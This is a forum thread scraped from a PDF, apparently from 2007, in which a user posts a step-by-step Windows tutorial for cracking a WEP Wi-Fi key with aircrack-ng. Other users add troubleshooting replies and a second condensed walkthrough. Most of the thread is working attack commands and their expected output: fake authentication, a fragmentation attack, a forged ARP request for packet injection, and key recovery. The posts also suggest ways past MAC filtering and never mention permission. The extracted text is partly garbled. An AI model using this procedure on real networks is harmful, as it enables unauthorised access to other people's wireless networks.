The Cracking Wifi

8/13/2019 The Cracking Wifi

http://slidepdf.com/reader/full/the-cracking-wifi 1/16

THE CRACKING:

Step 1: - Open a command prompt (start > run > cmd.exe)

Step 2:

- type the following in the command prompt:

Quote: cd c:\aircrack\

- HIT ENTER

Step 3: - type the following in the same command prompt:

Quote: airserv-ng -d commview.dll

- HIT ENTER- You should see something like this coming up in the command prompt

Quote: Opening card commview.dllSetting chan 1Opening sock port 666Serving commview.dll chan 1 on port 666

Step 4: - Open a new command prompt (LEAVE THE PREVIOUS ONE OPEN AT ALL TIMES!!)- Typ the following the the new command prompt:


-HIT ENTER

Step 5: - Now typ this in the same command prompt:

Quote: airodump-ng 127.0.0.1:666

- HIT ENTER

note: if you know what channel the to-monitor-network is on you can make it this. I

recommend this!:



Quote: airodump-ng --channel YOURCHANNELNUMBER HERE 127.0.0.1:666

Airodump-ng should start capturing data from the networks on the given channel now, you'll

notice it isn't going fast (except if it's a big company's network or something). We are going tospeed this process up!Take a note of the following:1: BSSID of the network you want to crack = MAC address.2: ESSID of the network you want to crack = name of the network (example: wifi16,mynetwork,...)3: The mac of the card you are using to monitor the packets

LEAVE THE 2 COMMAND PROMPTS YOU ALREADY HAVE OPEN OPEN!!!

Step 6: - Open a new command prompt- Type in the following:


- HIT ENTER

Step 7: - Type in the following in command prompt:

Quote:

aireplay-ng -1 0 -e ESSID-OF-THE-NETWORK-YOU-WANT-TO-CRACK -aBSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -hMAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

es quite confusing so a quick example:

ESSID = wifi16 BSSID = 11:22:33:44:55:66

MAC OF CARD I'M USING = 01:23:45:67:89:01

so that will get me:

aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

if all goes well you'll get this as the outcome:

Quote: Sending Authentication RequestAuthentication successfulSending Association RequestAssociation successful



if you get:

Quote: AP rejects the source MAC address

It means MAC filtering is enabled on the network you want to crack and you'll need to gethold of a mac address that's allowed access.

if you keep getting:

Quote: sending authentication request

Try moving closer to the AP!

Step 8: in the same command prompt as the one in step 7 type:

Quote: aireplay-ng -5 -b BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -hMAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

es quite confusing once again so a quick example:

BSSID = 11:22:33:44:55:66

MAC OF CARD I'M USING = 01:23:45:67:89:01

so that will get me:

aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

if all goes well you'll get this:

Quote: Waiting for a data packet...Read #number packets...

Step 9: if you wait a little bit you'll soon be prompted with a packet like this:

Quote:

Size: 120, FromDS: 1, ToDS: 0 (WEP)

BSSID = the bssidDest. MAC = the dest macSource MAC = the source mac



0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 [email protected]: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0.

0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l....0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q•.D...w.....<R.0x0070: 0505 933f af2f 740e ...?./t.

Use this packet ?

note: size can vary, I always pressed in y and it worked - press in Y- HIT ENTER

You should see something like this coming up (or similar):

Quote: Saving chosen packet in replay_src-0124-161120.capData packet found!Sending fragmented packetGot RELAYED packet!!Thats our ARP packet!Trying to get 384 bytes of a keystreamGot RELAYED packet!!Thats our ARP packet!

Trying to get 1500 bytes of a keystreamGot RELAYED packet!!Thats our ARP packet!Saving keystream in fragment-0124-161129.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Note 1: It doesn't need to be 1500 bytes!!

Note 2: Check the bold part, you're going to need this file!

AGAIN DON'T CLOSE THIS COMMAND PROMPT!!

if you keep getting:Quote: Data packet found!Sending fragmented packet No answer, repeating...Trying a LLC NULL packetSending fragmented packet No answer, repeating...



Sending fragmented packet...

Just keep trying! It automatically starts over again (moving closer to the AP has been reportedto help.)

anyways, if you got the bytes of keystream (everything worked) it's time for the next step!

Step 10:

- Press CTRL + C in the command prompt used in step 8- Now type in the following:

Quote: packetforge-ng -0 -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -hMAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR -k 192.168.1.100 -l (= an ELL nota 1) 192.168.1.1 -y fragment-0124-161129.xor -w arp-request

Remember the file I made bold in part 8? Well it's obviously the same as in 9 meaning youneed to put the same filename here.The part I made green here is the filename you use to save the packet, you can choosewhatever you want but you must use this filename in the upcomming steps!

Step 11:

Now that we've got our ARP REQ packet we can start injecting!

Here's how to do this.- Go to the command prompt used in step 9- Type in the following:

Quote: aireplay-ng -2 -r arp-request 127.0.0.1:666

The green part once again indicates the filename!

You should now see something like this coming up:

Quote: Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:14:6C:7E:40:80Dest. MAC = FF:FF:FF:FF:FF:FFSource MAC = 00:0F:B5:AB:CB:9D

0x0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d [email protected]: ffff ffff ffff 8001 6c48 0000 0999 881a ........lH......0x0020: 49fc 21ff 781a dc42 2f96 8fcc 9430 144d I.!.x..B/....0.M



0x0030: 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1 :.....gC.V$.....0x0040: d64f b709 .O..

Use this packet ?

- Type in Y- HIT ENTER

This should come up now:

Quote: Saving chosen packet in replay_src-0124-163529.capYou should also start airodump-ng to capture replies.End of file.

sent #numberOfPackets ... (#number pps)

You'll see the numberOfPackets rising really fast, you are injecting these packets now.

Step 12:

Now go back to the command prompt where you had airodump-ng in openand press CTRL + Cnow type in the following:

Quote: airodump-ng --channel CHANNELYOUWANTTOCAPTUREFROM --write Filename 127.0.0.1:666

Note: Filename = The name of the file where the data packets are saved, this will be used in

the next step

If all goes correct you should be capturing as much packets per second as you are injecting(maybe even more).

Step 13:

when you think you have enough...note: 200000 min for 64bit (just capture 1Million to be sure) ...press CTRL + C in the command prompt that has airodump-ng running and enter thefollowing:

Quote: aircrack-ng -n 64 Filename.cap

note:

Filename = see previous step

64 = the bit depth of the key (128 for 128bit etc...)



and if it goes like planned a message will pop-up saying:

Quote: KEY FOUND: YourKey

That's it! I hope this was helpful, any question/remarks/complaints please ask/tell and I'll tryto help/respond as soon as possible!!

Extra useful links:WEP CRACK tutorial from nokia:viewtopic.php?t=2069&highlight=wep

Info about the attack used(fragmentation):http://www.aircrack-ng.org/doku.php?id=fragmentation

Zermelo's thread about this subject:viewtopic.php?t=6781&postdays=0&postorder=asc&start=0

Topic on another forum about this:http://tinyshell.be/aircrackng/forum/in ... pic=1626.0 -------------------------------------------------------------------------------------------

Greetz .Transmit(If you all like this tut I'll make one on cracking WEP with commview too)

Last edited by .Transmit on Tue May 11, 2010 7:45 pm, edited 2 times in total.

dgpilot Post subject: Posted: Fri May 18, 2007 6:02 pm

Probie

Joined: Fri May 18, 20071:13 am

This tut is AWESOME!!! And so far it works like a charm, thanksvery much.

The only thing I had trouble with is step 3. It didn't work for meunless I entered the device id

http://tazforum.thetazzone.com/viewtopic.php?t=2069&highlight=wep


http://www.aircrack-ng.org/doku.php?id=fragmentation


http://tazforum.thetazzone.com/viewtopic.php?t=6781&postdays=0&postorder=asc&start=0


http://tinyshell.be/aircrackng/forum/index.php?topic=1626.0


http://tazforum.thetazzone.com/memberlist.php?mode=viewprofile&u=674&sid=c821e1dd94979ead018a9ef61cc8f6c4





http://tazforum.thetazzone.com/viewtopic.php?p=73596&sid=c821e1dd94979ead018a9ef61cc8f6c4

http://tazforum.thetazzone.com/viewtopic.php?f=28&t=6811&st=0&sk=t&sd=a&hilit=wep

















Posts: 8

dinowuff Post subject: Posted: Fri May 18, 2007 6:26 pm

I've posted HOW many

Joined: Sun Dec 25, 2005

11:26 pmPosts: 4933Location: Michigan

WRONG WRONG WRONG

Step one is Turn ON Laptop...

Just Kidding Nice example with good detail. Way to pull all thatinfo into one place.

_________________

No lusers were harmed in the creation of this Taz Zone Post.AND I WANT TO KNOW WHY NOT!09:F9:11:02:9D:74:E3:5B:D8:41:56:C5:63:56:88:C0

dinowuff Post subject: Posted: Fri May 18, 2007 6:35 pm

I've posted HOW many

Joined: Sun Dec 25, 200511:26 pmPosts: 4933Location: Michigan

Now go dig it!

I just submitted the thing

_________________

No lusers were harmed in the creation of this Taz Zone Post.AND I WANT TO KNOW WHY NOT!09:F9:11:02:9D:74:E3:5B:D8:41:56:C5:63:56:88:C0

























































brandnew2this Post subject:

Posted: Fri May 18, 2007 7:46 pm

I COULD be outshopping

Joined: Wed Mar 14, 20072:15 am

Posts: 65Location: Kentucky

I had trouble with step 3 as well what did you all do excactly. minesaid somthing about adapter not found. its a netgear and i know itworks with comm view,wil packets, aircrack and back track so iwas just trying to do it this way in order to make a video tutorial orsomthing

jaymill230 Post subject: Posted: Fri May 18, 2007 7:52 pm

UtterTazNutter

Joined: Thu Jan 04, 20079:59 pmPosts: 2227Location: Camp Lejeune, NC

I'm doing video tutorials for backtrack, but I've been a bit lazylately

_________________oo-rahwww.jaymill.net

.Transmit Post subject: Posted: Fri May 18, 2007 9:51 pm





http://www.jaymill.net/










































































































1st Century Addict

Joined: Sat Nov 04, 200612:47 pmPosts: 109

Strange, I'll try and see if I can get a solution for that problem withstep 3, what error were you getting exactly?

EDIT: K maybe found a solution for the ones in trouble with step

3!

Try this (let me know if it works):type this in the command window where the airserv commandfailed:

Quote: airserv-ng -d "commview.dll|debug"

Quotes are important!

You probable get something like this:

Quote: Opening card commview.dll|debug Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCardGold 8470get_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg ComboCard Gold - Paketplaner-MiniportAdapter not foundget_guid()airserv-ng: wi_open(): No error

now type this:

Quote: airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"

Quotes are important!

The red parts need to be the same! (they probably differ foreveryone)

Let me know if it works! and still try to give me the full error.

dgpilot Post subject: Posted: Fri May 18, 2007 10:48 pm
















Probie

Joined: Fri May 18, 20071:13 amPosts: 8

Yep thats what I had used earlier and it worked. I guess it dependson your config and cards.

brandnew2this Post subject: Posted: Sat May 19, 2007 7:22 am

I COULD be outshopping

Joined: Wed Mar 14, 2007

2:15 amPosts: 65Location: Kentucky

will try in the a.m. i just got back from my bacholer party so imnot really feeling like............well you know

gismo Post subject: Re: Tutorial: Crack WEP with aircrack + inject packets (WIND

Posted: Sun May 20, 2007 6:54 pm

Wannabee

Hello there!This tutorial looks really amazing, however I'am having a troublewith the step number 3 - after typing airserv-ng -d commview.dll instead of

Opening card commview.dll

Setting chan 1

Opening sock port 666

Serving commview.dll chan 1 on port 666





















































Joined: Sun May 20, 20076:33 pmPosts: 1

I see

Opening card commview.dll

F1

init_lib<>airserv-ng: wi_open<>: No error

After I try to type in step 5

airodump-ng 127.0.0.1:666 or

airodump-ng --channel YOURCHANNELNUMBER HERE

127.0.0.1:666 (In my case channel 7 is the best one)

I just get a message Failed to connect In other words connecting to 127.0.0.1:666 is not possible in my

case.

I ask you for apologies, I am a newbie, just let me know if youhave any idea how to work this out.I am using Windows Vista on Acer laptop with Atheros AR5005Gnetwork adapter, I installed everything according to the advices(drivers, dll files etc., commview is working normally as well).

Every little helps.

Thanks.[/i]

Xplode Post subject: Posted: Thu May 24, 2007 8:34 pm

Probie

Joined: Thu May 24, 20078:18 pm

gismo are you sure you got the right drivers?? I solved the problem installing Commview drivers, i had Wildpackets first.

I wanted to ask if the debug function would work like this in case iam using wildpackets: airserv-ng -d "peek.dll|debug" Or whatelse??

The AP i am connecting to seems to have a very low traffic so ikeep having (at step 9):Data packet found!
















Posts: 7 Sending fragmented packet No answer, repeating...Trying a LLC NULL packetSending fragmented packet No answer, repeating...

Sending fragmented packet...

even after trying for 2 hours...is the low traffic the problem?? I'msaying it because in airodump i got around 10 beacons per second but NO DATA (data=0) for my AP. How could i increase that?? Itried by connecting (without a valid WEP Key) using myintegrated wireless card, and i had some data, but not sufficient oruseful.

Can someone give me some hints please?

jaymill230 Post subject: Posted: Thu May 24, 2007 8:43 pm

UtterTazNutter

Joined: Thu Jan 04, 20079:59 pmPosts: 2227Location: Camp Lejeune, NC

check my tutorial for clientless WEP cracking with fake auth, itswritten for backtrack, but does the exact same thing, range is often

a problem.

_________________oo-rahwww.jaymill.net

Xplode Post subject: Posted: Thu May 24, 2007 8:57 pm




















































Probie

Joined: Thu May 24, 20078:18 pmPosts: 7

i don't think range is my problem, signal is very strong, could it bethat anyway? i ll read your tut carefully, thanx

Mufftool Post subject: Posted: Thu May 24, 2007 9:42 pm

Probie

Joined: Thu May 24, 20079:16 pmPosts: 5

Hi, I can get to step 9, but when I enter Y after 'Use this packet?', Iget blue screen, flashed error message and my computer dies.

jaymill230 Post subject: Posted: Fri May 25, 2007 12:24 am

UtterTazNutter

Joined: Thu Jan 04, 20079:59 pmPosts: 2227Location: Camp Lejeune,

the program was just recently patched to windows, so its a bit buggy. It may be a driver problem, try reinstalling your

wildpackets driver.





















































NC

In this example:

the id# of my adapter is {177946D-6D58-4272-AACE-D11DFAE55B8D}the essid of the AP is VQD21

the bssid of the Ap is 00:18:01:E6:B4:3F

the mac address of MY adapter is: 00:0E:9B:45:40:ED

the AP is on channel 9

the driver is the commview atheros driver

Fragmentation Attack

Step 1: Start the wireless interface in monitor mode on AP channel

Airserv-ng –d “commview.dll|{177946D-6D58-4272-AACE-D11DFAE55B8D}” –c9

Step 2: Use aireplay-ng to do a fake authentication with the access point

Aireplay-ng -1 0 –e VQD21 –a 00:18:01:E6:B4:3F –h 00:0E:9B:45:40:ED 127.0.0.1:666

Step 3: Use aireplay-ng to run the fragmentation attack and obtain PRGA Data

aireplay-ng -5 -b 00:18:01:E6:B4:3F -h 00:0E:9B:45:40:ED 127.0.0.1:666

Step 4: Use packetforge to generate an ARP packet

packetforge-ng -0 -a 00:18:01:E6:B4:3F -h 00:0E:9B:45:40:ED -k 255.255.255.255 -l 255.255.255.255 -y

fragment-0124-161129.xor -w arp-request.cap

Step 5: Use aireplay-ng to replay our forged ARP request

aireplay-ng -2 -r arp-request.cap 120.0.0.1:666

Step 6: Start airodump-ng to capture the IVs

Airodump-ng –c 9 –-bssid 00:18:01:E6:B4:3F –-ivs –w VQD21 127.0.0.1:666

Step 7: Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:18:01:E6:B4:3F VQD21.ivs



as a hurestic consideration, for a 64 bit key, you should capture 250,000 ivs, 2,000,000 for 104 bit key.

Documents

The Cracking Wifi